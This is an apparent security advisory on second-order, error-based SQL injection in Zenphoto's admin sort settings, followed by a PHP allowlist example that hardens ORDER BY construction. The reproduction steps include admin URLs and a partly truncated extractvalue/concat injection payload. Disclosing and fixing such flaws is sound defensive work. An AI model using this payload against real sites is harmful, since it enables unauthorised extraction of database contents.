There are multiple second-order, error-based SQL injections into the
ORDER BY keyword in the admin area.
- Visit zp-core/admin-options.php?saved&tab=gallery
  (alternatively visit zp-core/admin-options.php?saved&tab=image)
- Set "Sort gallery by" to "Custom"
- Set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
- Visit zp-core/admin-upload.php?page=upload&tab=http&type=images
- Alternatively, visiting either of these will also trigger the injection:
The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
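The root cause is that a stored option (the custom sort field list) is later concatenated into an ORDER BY clause without validation. The following is an added hardening example, not Zenphoto's own code: the column allowlist and the function name are assumptions, and the inputs at the bottom are constructed for the demonstration.

```php
<?php
// Added example (not from the Zenphoto code base): build an ORDER BY clause
// only from identifiers that appear in an allowlist, so a stored "custom
// sort fields" setting cannot inject SQL when it is read back and used later.

/**
 * @param string   $customFields   Comma-separated field list as stored in the option
 * @param string[] $allowedColumns Column names known to exist on the table (assumed list)
 * @param bool     $descending     Sort direction chosen in the admin UI
 * @return string  Safe ORDER BY fragment, or '' when no fields were given
 * @throws InvalidArgumentException on any field that is not in the allowlist
 */
function buildSafeOrderBy(string $customFields, array $allowedColumns, bool $descending = false): string
{
    $allowed = array_flip($allowedColumns); // constant-time membership lookups
    $parts = [];
    foreach (explode(',', $customFields) as $field) {
        $field = trim($field);
        if ($field === '') {
            continue; // tolerate trailing commas such as "id,title,"
        }
        // Exact-match allowlist: a function call, comment sequence or
        // sub-select can never equal a plain column name, so it is rejected.
        if (!isset($allowed[$field])) {
            throw new InvalidArgumentException("Unknown sort field: $field");
        }
        // The identifier is now a known-safe name; quote it anyway so that
        // a column named like a reserved word still parses.
        $parts[] = '`' . $field . '`' . ($descending ? ' DESC' : ' ASC');
    }
    if ($parts === []) {
        return '';
    }
    return 'ORDER BY ' . implode(', ', $parts);
}

// Constructed inputs for demonstration only.
$columns = ['id', 'title', 'date', 'sort_order'];
echo buildSafeOrderBy('id, title', $columns, true), "\n";
try {
    buildSafeOrderBy('id,extractvalue(0x0a,x)', $columns);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Validating at read time (when the stored option is turned into SQL) rather than only at save time is what closes a second-order injection, since the stored value may have been written through another path.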